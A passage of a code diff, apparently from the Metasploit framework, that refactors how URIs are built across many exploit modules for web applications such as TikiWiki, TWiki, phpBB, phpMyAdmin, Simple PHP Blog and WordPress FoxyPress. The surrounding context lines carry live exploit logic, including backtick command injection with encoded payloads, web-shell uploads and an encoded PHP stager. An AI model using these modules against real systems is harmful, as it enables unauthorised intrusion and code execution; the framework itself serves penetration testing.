'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>
|
||||
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
response = send_request_raw({
|
||||
# Allow findsock payloads to work
|
||||
'global' => true,
|
||||
'uri' => normalize_uri(datastore['URI']) + "/" + File.basename(filename)
|
||||
'uri' => normalize_uri(datastore['URI'], File.basename(filename))
|
||||
}, timeout)
|
||||
|
||||
handler
|
||||
|
@ -54,12 +54,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri = target_uri.path
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php"
|
||||
'uri' => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php")
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
@ -83,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php",
|
||||
'uri' => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php"),
|
||||
'ctype' => 'multipart/form-data; boundary=' + post_data.bound,
|
||||
'data' => post_data.to_s
|
||||
})
|
||||
@ -96,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{uri}wp-content/affiliate_images/#{$1}.php"
|
||||
'uri' => normalize_uri(uri, "wp-content/affiliate_images", "#{$1}.php")
|
||||
})
|
||||
|
||||
if res and res.code != 200
|
||||
|
@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
1.upto(32) do |x|
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['URI']) + '/viewtopic.php?topic=' + x.to_s,
|
||||
'uri' => normalize_uri(datastore['URI'], '/viewtopic.php') + '?topic=' + x.to_s,
|
||||
}, 25)
|
||||
|
||||
if (res and res.body.match(/class="postdetails"/))
|
||||
@ -92,14 +92,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
return
|
||||
else
|
||||
|
||||
sploit = normalize_uri(datastore['URI']) + "/viewtopic.php?t=#{topic}&highlight="
|
||||
sploit = normalize_uri(datastore['URI'], "/viewtopic.php") + "?t=#{topic}&highlight="
|
||||
|
||||
case target.name
|
||||
when /Automatic/
|
||||
req = "/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527"
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['URI']) + req
|
||||
'uri' => normalize_uri(datastore['URI'], req)
|
||||
}, 25)
|
||||
|
||||
print_status("Trying to determine which attack method to use...")
|
||||
|
@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def exploit
|
||||
# First, grab the session cookie and the CSRF token
|
||||
print_status("Grabbing session cookie and CSRF token")
|
||||
uri = normalize_uri(datastore['URI']) + "/scripts/setup.php"
|
||||
uri = normalize_uri(datastore['URI'], "/scripts/setup.php")
|
||||
response = send_request_raw({ 'uri' => uri})
|
||||
if !response
|
||||
fail_with(Exploit::Failure::NotFound, "Failed to retrieve hash, server may not be vulnerable.")
|
||||
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# Now that we've got the cookie and token, send the evil
|
||||
print_status("Sending save request")
|
||||
response = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['URI']) + "/scripts/setup.php",
|
||||
'uri' => normalize_uri(datastore['URI'], "/scripts/setup.php"),
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'cookie' => cookie,
|
||||
@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
response = send_request_raw({
|
||||
# Allow findsock payloads to work
|
||||
'global' => true,
|
||||
'uri' => normalize_uri(datastore['URI']) + "/config/config.inc.php"
|
||||
'uri' => normalize_uri(datastore['URI'], "/config/config.inc.php")
|
||||
}, timeout)
|
||||
|
||||
handler
|
||||
|
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base}/index.php",
|
||||
'uri' => normalize_uri("#{base}/index.php"),
|
||||
'vars_get' =>
|
||||
{
|
||||
'c' => 'access',
|
||||
|
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def exploit
|
||||
command = Rex::Text.uri_encode(payload.encoded)
|
||||
urlconfigdir = normalize_uri(datastore['URI']) + "/repository/annotate?rev=`#{command}`"
|
||||
urlconfigdir = normalize_uri(datastore['URI'], "/repository/annotate") + "?rev=`#{command}`"
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => urlconfigdir,
|
||||
|
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['URI']) + '/index.php'
|
||||
'uri' => normalize_uri(datastore['URI'], '/index.php')
|
||||
}, 25)
|
||||
|
||||
if (res and res.body =~ /Simple PHP Blog (\d)\.(\d)\.(\d)/)
|
||||
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def retrieve_password_hash(file)
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['URI']) + file,
|
||||
'uri' => normalize_uri(datastore['URI'], file)
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK" and res.body)
|
||||
@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def create_new_password(user, pass)
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI']) + '/install03_cgi.php',
|
||||
'uri' => normalize_uri(datastore['URI'], '/install03_cgi.php'),
|
||||
'method' => 'POST',
|
||||
'data' => "user=#{user}&pass=#{pass}",
|
||||
}, 25)
|
||||
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def retrieve_session(user, pass)
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI']) + "/login_cgi.php",
|
||||
'uri' => normalize_uri(datastore['URI'], "/login_cgi.php"),
|
||||
'method' => 'POST',
|
||||
'data' => "user=#{user}&pass=#{pass}",
|
||||
}, 25)
|
||||
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
data << "\r\n--#{boundary}--"
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['URI']) + "/upload_img_cgi.php",
|
||||
'uri' => normalize_uri(datastore['URI'], "/upload_img_cgi.php"),
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>
|
||||
@ -160,7 +160,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def reset_original_password(hash, scriptlocation)
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['URI']) + scriptlocation,
|
||||
'uri' => normalize_uri(datastore['URI'], scriptlocation),
|
||||
'method' => 'POST',
|
||||
'data' => "hash=" + hash,
|
||||
}, 25)
|
||||
@ -177,7 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
delete_path = "/comment_delete_cgi.php?y=05&m=08&comment=.#{file}"
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['URI']) + delete_path,
|
||||
'uri' => normalize_uri(datastore['URI'], delete_path),
|
||||
}, 25)
|
||||
|
||||
if (res)
|
||||
|
@ -75,7 +75,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def exploit
|
||||
base = normalize_uri(target_uri.path)
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
username = datastore['USERNAME']
|
||||
@ -89,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => "#{base}index.php" ,
|
||||
'uri' => normalize_uri(base, "index.php") ,
|
||||
'method' => "POST",
|
||||
'headers' =>
|
||||
{
|
||||
|
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def check
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => normalize_uri(datastore['URI']) + "/tiki-index.php",
|
||||
'uri' => normalize_uri(datastore['URI'], "/tiki-index.php"),
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
@ -155,8 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# when exploiting this vulnerability :)
|
||||
#
|
||||
def build_uri(f_val)
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri << "/tiki-graph_formula.php?"
|
||||
uri = normalize_uri(datastore['URI'], "/tiki-graph_formula.php?")
|
||||
|
||||
# Requirements:
|
||||
query = ''
|
||||
|
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def check
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => normalize_uri(datastore['URI']) + "/tiki-index.php",
|
||||
'uri' => normalize_uri(datastore['URI'], "/tiki-index.php"),
|
||||
'method' => 'GET'
|
||||
}, 25)
|
||||
|
||||
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def create_temp_file
|
||||
url_jhot = normalize_uri(datastore['URI']) + "/jhot.php"
|
||||
url_jhot = normalize_uri(datastore['URI'], "/jhot.php")
|
||||
|
||||
scode =
|
||||
"\x0d\x0a\x3c\x3f\x70\x68\x70\x0d\x0a\x2f\x2f\x20\x24\x48\x65\x61" +
|
||||
@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def exe_command(cmd)
|
||||
url_config = normalize_uri(datastore['URI']) + "/img/wiki/tiki-config.php"
|
||||
url_config = normalize_uri(datastore['URI'], "/img/wiki/tiki-config.php")
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => url_config,
|
||||
@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def remove_temp_file
|
||||
url_config = normalize_uri(datastore['URI']) + "/img/wiki/tiki-config.php"
|
||||
url_config = normalize_uri(datastore['URI'], "/img/wiki/tiki-config.php")
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => url_config,
|
||||
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def exploit
|
||||
base = normalize_uri(target_uri.path)
|
||||
base = target_uri.path
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem")
|
||||
|
||||
res = send_request_cgi(
|
||||
'uri' => "#{base}tiki-rss_error.php"
|
||||
'uri' => normalize_uri(base, "tiki-rss_error.php")
|
||||
)
|
||||
|
||||
if not res or res.code != 200 or not res.body =~ /[> ](\/.*)tiki-rss_error\.php/
|
||||
@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => "#{base}tiki-print_multi_pages.php",
|
||||
'uri' => normalize_uri(base, "tiki-print_multi_pages.php"),
|
||||
'method' => 'POST',
|
||||
'vars_post' => {
|
||||
'printpages' => printpages
|
||||
@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base + @upload_php}",
|
||||
'uri' => normalize_uri(base, @upload_php),
|
||||
'headers' => {
|
||||
'Cmd' => Rex::Text.encode_base64(payload.encoded)
|
||||
}
|
||||
|
@ -61,8 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
#
|
||||
def check
|
||||
test_file = rand_text_alphanumeric(8+rand(8))
|
||||
cmd_base = normalize_uri(datastore['URI']) + '/view/Main/TWikiUsers?rev='
|
||||
test_url = normalize_uri(datastore['URI']) + '/' + test_file
|
||||
cmd_base = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers?rev=')
|
||||
test_url = normalize_uri(datastore['URI'], test_file)
|
||||
|
||||
# first see if it already exists (it really shouldn't)
|
||||
res = send_request_raw({
|
||||
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
rev = rand_text_numeric(1+rand(5))
|
||||
rev << ' `' + payload.encoded + '`#'
|
||||
query_str = normalize_uri(datastore['URI']) + '/view/Main/TWikiUsers'
|
||||
query_str = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers')
|
||||
query_str << '?rev='
|
||||
query_str << Rex::Text.uri_encode(rev)
|
||||
|
||||
|
@ -56,8 +56,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def check
|
||||
content = rand_text_alphanumeric(16+rand(16))
|
||||
test_file = rand_text_alphanumeric(8+rand(8))
|
||||
cmd_base = normalize_uri(datastore['URI']) + '/view/Main/WebSearch?search='
|
||||
test_url = normalize_uri(datastore['URI']) + '/view/Main/' + test_file
|
||||
cmd_base = normalize_uri(datastore['URI'], '/view/Main/WebSearch?search=')
|
||||
test_url = normalize_uri(datastore['URI'], '/view/Main/', test_file)
|
||||
|
||||
# first see if it already exists (it really shouldn't)
|
||||
res = send_request_raw({
|
||||
@ -105,13 +105,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
search = rand_text_alphanumeric(1+rand(8))
|
||||
search << "';" + payload.encoded + ";#\'"
|
||||
|
||||
query_str = normalize_uri(datastore['URI']) + '/view/Main/WebSearch'
|
||||
query_str = normalize_uri(datastore['URI'], '/view/Main/WebSearch')
|
||||
query_str << '?search='
|
||||
query_str << Rex::Text.uri_encode(search)
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => query_str,
|
||||
'uri' => query_str,
|
||||
}, 25)
|
||||
|
||||
if (res and res.code == 200)
|
||||
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
|
||||
def check
|
||||
res = send_request_raw({'uri'=>normalize_uri(target_uri.host)})
|
||||
res = send_request_raw({'uri'=>normalize_uri(target_uri.path)})
|
||||
if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and
|
||||
res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
|
@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
# Sending the request
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(datastore['DIR']) + '/Login.jsp?' + crash,
|
||||
'uri' => normalize_uri(datastore['DIR'], '/Login.jsp?') + crash,
|
||||
'method' => 'GET',
|
||||
'headers' => {
|
||||
'Accept' => '*/*',
|
||||
|
@ -126,11 +126,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
pass = datastore['SysaxPASS']
|
||||
|
||||
creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}"
|
||||
uri = normalize_uri(target_uri.to_s)
|
||||
uri = target_uri.to_s
|
||||
# Login to get SID value
|
||||
r = send_request_cgi({
|
||||
'method' => "POST",
|
||||
'uri' => "#{uri}/scgi?sid=0&pid=dologin",
|
||||
'uri' => normalize_uri("#{uri}/scgi?sid=0&pid=dologin"),
|
||||
'data' => creds
|
||||
})
|
||||
|
||||
@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir
|
||||
uri normalize_uri(target_uri.to_s)
|
||||
r = send_request_cgi({
|
||||
'uri' => "#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm",
|
||||
'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm"),
|
||||
'method' => 'POST',
|
||||
})
|
||||
|
||||
@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669"
|
||||
uri = normalize_uri(target_uri.to_s)
|
||||
r = send_request_cgi({
|
||||
'uri' => "#{uri}/scgi?sid=#{sid}&pid=mk_folder2_name1.htm",
|
||||
'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=mk_folder2_name1.htm"),
|
||||
'method' => 'POST',
|
||||
'data' => post_data.to_s,
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
||||
|
@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
data = 'Content-Type: ' + sploit
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/AdvancedDataFactory.Query',
|
||||
'uri' => normalize_uri(datastore['PATH'], '/AdvancedDataFactory.Query'),
|
||||
'headers' =>
|
||||
{
|
||||
'Content-Length' => data.length,
|
||||
|
@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
data << sploit
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/' + method,
|
||||
'uri' => normalize_uri(datastore['PATH'], method),
|
||||
'agent' => 'ACTIVEDATA',
|
||||
'headers' =>
|
||||
{
|
||||
@ -200,7 +200,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
data << "\r\n\r\n--#{boundary}--\r\n"
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/VbBusObj.VbBusObjCls.GetMachineName',
|
||||
'uri' => normalize_uri(datastore['PATH'], '/VbBusObj.VbBusObjCls.GetMachineName'),
|
||||
'agent' => 'ACTIVEDATA',
|
||||
'headers' =>
|
||||
{
|
||||
|
Loading…
Reference in New Issue
Block a user